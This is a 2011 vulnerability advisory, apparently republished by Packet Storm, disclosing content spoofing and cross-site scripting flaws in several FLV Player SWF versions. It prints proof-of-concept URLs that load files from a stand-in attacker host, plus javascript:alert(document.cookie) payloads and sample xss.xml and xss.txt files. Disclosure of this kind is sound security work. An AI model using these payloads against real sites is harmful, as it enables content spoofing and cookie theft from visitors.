FLV Player suffers from cross site scripting and content spoofing vulnerabilities.
405c89b43dc0abb23e433cb77a1fff5f210095dfe342eaf687d7bbb6e56e913dHello list!
I want to warn you about Content Spoofing and Cross-Site Scripting
vulnerabilities in FLV Player.
-------------------------
Affected products:
-------------------------
Vulnerable are different versions of FLV Player (MINI, NORMAL, MAXI and
MULTI). Note, that version NORMAL occurs under names player_flv.swf and
player_flv_classic.swf.
The author of FLV Player didn't fix these vulnerabilities.
----------
Details:
----------
Content Spoofing (WASC-12):
Flash-files of player FLV Player accept arbitrary addresses in parameter
configxml, which allows to spoof content of flash - i.e. by setting address
of configuration file from other site.
http://site/player_flv.swf?configxml=http://attacker/1.xml
http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml
http://site/player_flv_multi.swf?configxml=http://attacker/1.xml
Flash-files of player FLV Player accept arbitrary addresses in parameter
config, which allows to spoof content of flash - i.e. by setting address of
configuration file from other site.
http://site/player_flv.swf?config=http://attacker/1.txt
http://site/player_flv_maxi.swf?config=http://attacker/1.txt
http://site/player_flv_multi.swf?config=http://attacker/1.txt
Flash-files of player FLV Player allow to spoof all important parameters,
including flv and startimage, and at that accept arbitrary addresses in
parameters flv and startimage, which allows to spoof content of flash - i.e.
by setting addresses of video and image from other site. And for setting of
links at arbitrary site it's possible to use parameters onclick and
ondoubleclick.
http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_mini.swf?flv=http://attacker/1.flv
XSS (WASC-08):
http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml
http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml
File xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>
http://site/player_flv_maxi.swf?config=http://attacker/xss.txt
http://site/player_flv_multi.swf?config=http://attacker/xss.txt
File xss.txt:
onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)
The code will execute after a click (or double click). It's strictly social
XSS.
------------
Timeline:
------------
2011.02.24 - found these vulnerabilities in different versions of the player
and informed owner of the site which used it.
2011.04.21 - announced at my site.
2011.04.22 - informed developer.
2011.08.20 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/5098/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed